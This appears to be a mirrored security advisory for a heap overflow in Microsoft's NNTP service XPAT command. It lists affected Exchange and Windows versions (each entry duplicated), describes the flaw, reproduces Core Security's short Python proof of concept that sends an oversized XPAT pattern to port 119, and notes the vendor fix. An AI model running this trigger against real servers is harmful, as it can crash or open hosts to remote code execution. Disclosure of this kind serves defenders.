Microsoft Exchange Server 5.5 SP3
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- Vulnerability discussion

The Microsoft Network News Transfer Protocol (NNTP) Component is prone to a buffer overflow condition. Successful exploitation of this vulnerability could allow remote code execution in the context of the process accessing the vulnerable component.

- Exploit

Core Security Technologies has developed a private exploit for this vulnerability, however, it is not known to be circulating in the wild.

Core Security Technologies has released a proof-of-concept for this vulnerability:

#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# http://www.coresecurity.com
#--

from socket import *

host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)

- Solution

Microsoft has released a bulletin that includes fixes to address this issue for supported versions of the operating system.


Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows Server 2003 Web Edition

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows 2000 Server SP3

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows NT Enterprise Server 4.0 SP6a

Microsoft Windows 2000 Server SP4

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- References

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.